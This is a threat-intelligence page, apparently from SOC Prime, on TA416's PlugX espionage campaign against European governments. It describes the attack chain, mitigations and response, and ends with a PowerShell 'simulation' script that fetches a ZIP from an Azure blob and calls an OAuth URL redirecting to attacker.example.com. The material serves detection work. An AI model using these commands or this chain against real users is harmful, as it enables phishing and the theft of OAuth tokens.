SOC Prime Bias: 重要

08 4月 2026 14:40
newspaper icon Proofpoint

私は再びEUに戻ってきた:TA416が欧州政府の諜報活動キャンペーンを再開

Author Photo
Ruslan Mikhalov SOC Primeの脅威リサーチ責任者 linkedin icon フォローする
私は再びEUに戻ってきた:TA416が欧州政府の諜報活動キャンペーンを再開
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

TA416は、中国に関連する脅威アクターで、2025年半ばにヨーロッパの政府および外交機関を再び標的にし始めた。これには軽量のウェブバグによる偵察とカスタマイズされたPlugXバックドアの配信が含まれており、Cloudflare Turnstileスタイルの偽装、OAuthリダイレクションの悪用、MSBuildによるダウンローダーの導入が初期アクセスのチェーンに回転している。2026年3月までには、同じ手法がイランに関連する地域の緊張が高まる中、中東の外交目標にまで広がったことが報告されている。このキャンペーンでは、侵害されたメールボックス、DLLサイドローディングのための署名されたWindowsバイナリ、および迅速なターンオーバーのC2インフラを利用している。

調査

Proofpointは、フリーメールアドレスや侵害された政府アカウントから送信された複数のスピアフィッシングウェーブを追跡し、トラッキングピクセルまたは武器化されたアーカイブを使用してきた。アーカイブ型のチェーンでは、ZIP密輸を利用してLNKアーティファクトでMSIやTARパッケージをステージングし、その後にPlugXをサイドローディングするために署名された実行可能ファイルを起動していた。一方で、TA416はMicrosoft Entra ID OAuthリダイレクションを悪用し、悪意のあるC#プロジェクトファイルと組み合わせられたリネームされたMSBuildバイナリを使ってペイロードを取得し実行していた。C2トラフィックはHTTP上で観測され、RC4で暗号化されたメッセージとユニークなヘッダー/クッキーパターンがリクエストとレスポンスを形成するために使用されていた。

軽減策

強力なメール認証を実施し、未知のクラウドストレージプロバイダーからのインバウンドコンテンツに対する制御を強化せよ。サイドローディングに一般的に悪用される署名されたバイナリ(例:cnmpaui.exeやsteam_monitor.exe)の疑わしい実行を監視し、異常なDLL検索順序の動作にアラートを設定せよ。暗号化されたC2に関連する通常ではないHTTPヘッダーまたはクッキーのシグネチャを検出し、可能であれば既知のTA416ドメイン/IPをブロックせよ。新しく作成されたランキーの持続性や、パブリックまたは共有ディレクトリへの予期しないファイル書き込みに対するエンドポイント監視を強化せよ。

対応策

活動が検出された場合、ホストを隔離し、揮発性メモリをキャプチャし、スコーピングのために関連するエンドポイントおよびメールログを保存せよ。PlugXアーティファクトであるCNCLID.dllローダー、Canon.datシェルコード、およびdGcEuQhKTミューテックスをハントせよ。侵害されたメールアカウントのアクセスを取り消し、認証情報をリセットし、スケジュールされたタスクや他の持続メカニズムを削除せよ。RC4で暗号化されたHTTPビーコンをネットワークテレメトリで分析し、関連するドメイン/URLをブロックし、環境全体でのハンティングを拡大せよ。

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["<b>Action</b> – T1566 Phishing: Phishing emails sent from compromised accounts and generic phishing. Recipients click malicious links."] class action_initial_access action tool_phishing_email["<b>Tool</b> – <b>Name</b>: Phishing Email<br/><b>Technique</b>: T1566"] class tool_phishing_email tool action_user_execution["<b>Action</b> – T1204 User Execution: Victims click malicious URL leading to malicious ZIP download."] class action_user_execution action tool_malicious_zip["<b>Tool</b> – <b>Name</b>: Malicious ZIP archive containing LNK shortcut"] class tool_malicious_zip tool action_lnk_smuggling["<b>Action</b> – T1027.012 LNK Icon Smuggling: LNK shortcut runs PowerShell script."] class action_lnk_smuggling action process_powershell["<b>Process</b> – PowerShell execution to extract signed binary"] class process_powershell process tool_signed_binary["<b>Tool</b> – <b>Name</b>: cnmpaui.exe (signed legitimate binary)"] class tool_signed_binary tool action_dll_sideloading["<b>Action</b> – T1218 System Binary Proxy Execution: DLL sideloading loads malicious DLL."] class action_dll_sideloading action malware_malicious_dll["<b>Malware</b> – Malicious DLL loaded via sideloading"] class malware_malicious_dll malware action_msbuild_execution["<b>Action</b> – T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild used to download and execute PlugX."] class action_msbuild_execution action tool_msbuild["<b>Tool</b> – <b>Name</b>: Renamed MSBuild executable"] class tool_msbuild tool tool_csharp_project["<b>Tool</b> – <b>Name</b>: Malicious C# project file"] class tool_csharp_project tool malware_plugx["<b>Malware</b> – PlugX payload"] class malware_plugx malware action_persistence["<b>Action</b> – T1037.001 Persistence via Run registry key and shortcut modification."] class action_persistence action process_registry["<b>Process</b> – Creation of Run registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["<b>Action</b> – T1553.002 Subvert Trust Controls: Abuse of signed executables and heavy obfuscation."] class action_defense_evasion action action_apddomain_hijack["<b>Action</b> – T1574.014 Hijack Execution Flow: AppDomainManager hijack via MSBuild chain"] class action_apddomain_hijack action action_c2["<b>Action</b> – T1071.001 Web Protocols and T1573.001 Encrypted Channel: HTTP C2 with RC4 encryption"] class action_c2 action process_c2_communication["<b>Process</b> – Encrypted HTTP communication with C2 server"] class process_c2_communication process action_exfiltration["<b>Action</b> – T1041 Exfiltration Over C2 Channel: Data sent over encrypted channel"] class action_exfiltration action %% Connections action_initial_access –>|delivers| tool_phishing_email tool_phishing_email –>|contains link leading to| action_user_execution action_user_execution –>|downloads| tool_malicious_zip tool_malicious_zip –>|contains| action_lnk_smuggling action_lnk_smuggling –>|executes| process_powershell process_powershell –>|extracts| tool_signed_binary tool_signed_binary –>|loads| action_dll_sideloading action_dll_sideloading –>|loads| malware_malicious_dll malware_malicious_dll –>|prepares environment for| action_msbuild_execution action_msbuild_execution –>|uses| tool_msbuild tool_msbuild –>|processes| tool_csharp_project tool_csharp_project –>|downloads and runs| malware_plugx malware_plugx –>|creates| action_persistence action_persistence –>|writes| process_registry action_persistence –>|modifies shortcut for| action_lnk_smuggling action_persistence –>|enables| action_defense_evasion action_defense_evasion –>|applies| action_apddomain_hijack action_apddomain_hijack –>|enables| action_c2 action_c2 –>|communicates via| process_c2_communication process_c2_communication –>|exfiltrates data via| action_exfiltration "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Stage the payload: The attacker uploads a malicious ZIP file (payload.zip) to the Azure Blob container mydownload.z29.web.core.windows.net.
    2. Craft a lure page: A malicious HTML page hosted on the same domain includes an <img> tag that points to the Azure Blob URL (triggering the download) and a hidden <iframe> that immediately redirects the victim to a Microsoft Entra ID OAuth 2.0 authorization endpoint with a redirect_uri pointing to the attacker‑controlled domain.
    3. Victim interaction: The victim visits the lure page (e.g., via a phishing email). The browser issues two HTTP GET requests in rapid succession—one for the Blob URL and one for the OAuth URL. Azure Activity Logs record both requests under the same proxy session, satisfying the rule’s selection_blob AND selection_oauth condition.

  • Regression Test Script: (executed from the victim machine to reproduce the telemetry)

    # TA416 Azure Blob + OAuth trigger simulation
# Step 1: Download malicious blob (simulated with a benign file)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# Step 2: Immediately invoke the OAuth authorization URL (simulated redirect)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "Simulation complete – both URLs requested."

  • Cleanup Commands:

    # Remove the downloaded file
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# Clear PowerShell session variables
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加